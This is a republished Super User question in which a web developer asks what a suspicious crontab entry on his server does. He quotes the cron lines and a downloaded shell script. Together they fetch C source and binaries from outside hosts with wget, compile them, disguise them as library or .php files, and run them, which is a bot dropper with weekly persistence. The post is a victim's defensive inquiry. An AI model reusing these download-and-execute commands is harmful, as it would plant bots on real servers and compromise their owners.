Is SecureShellz bot a virus? How does it work?

Posted by ProGNOMmers on Super User See other posts from Super User or by ProGNOMmers
Published on 2012-07-06T09:08:55Z Indexed on 2012/07/06 9:18 UTC
Read the original article Hit count: 1187

Filed under:
|
|
|
|

I'm using a development server in which I found this in the crontab:

[...]
* * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1
@weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd
[...]

http://stablehost.us/bots/regular.bot contents are:

#!/bin/sh

 if [ $(whoami) = "root" ]; then

    echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make
    echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make

    pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc

    wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c
    wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1
    wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2  
    exit 1
 fi


 wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php
 wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa
 wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_

I cannot contact the sysadmin for various reasons, so I cannot ask infos about this to him.

It seems to me this script downloads some remote C source codes and binaries, compile them and execute them.

I am a web developer, so I am not an expert about C language, but watching at the downloaded files it seems to me a bot injected in the cron of the server.

Can you give me more infos about what this code does? About its working, its purposes?

© Super User or respective owner

Related posts about linux

Related posts about security